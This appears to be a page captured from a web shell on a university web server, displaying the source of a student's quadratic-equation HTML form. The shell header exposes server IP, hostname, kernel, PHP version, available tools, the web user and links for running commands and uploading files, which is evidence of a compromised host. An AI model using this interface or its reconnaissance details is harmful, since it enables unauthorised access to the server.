Server IP : 172.16.15.8 / Your IP : 13.59.198.150 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/kahenry/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- QuadraticEquation.html Author: Kenneth Henry Instructor: Dr. Wang Due: February 13, 2022 Goal: Design a form, QuadraticEquation.html that includes the text boxes for a, b, and c of quadratic equation, ax2+bx+c=0. And then create the action page, QuadraticEquation.php, that displays the solutions (display to two decimal places). If no real roots, display the message. --> <CENTER> <font color=orange> <p> <H2> Quadratic Equation </H2> <HR> <FORM action=QuadraticEquation.php method=post> <p> a? <INPUT type=text name=aVar> <P> b? <INPUT type=text name=bVar> <P> c? <INPUT type=text name=cVar> <p> <INPUT type=submit value="Submit Form"> <INPUT type=submit value="Reset Form"> </FORM> </font> </Center>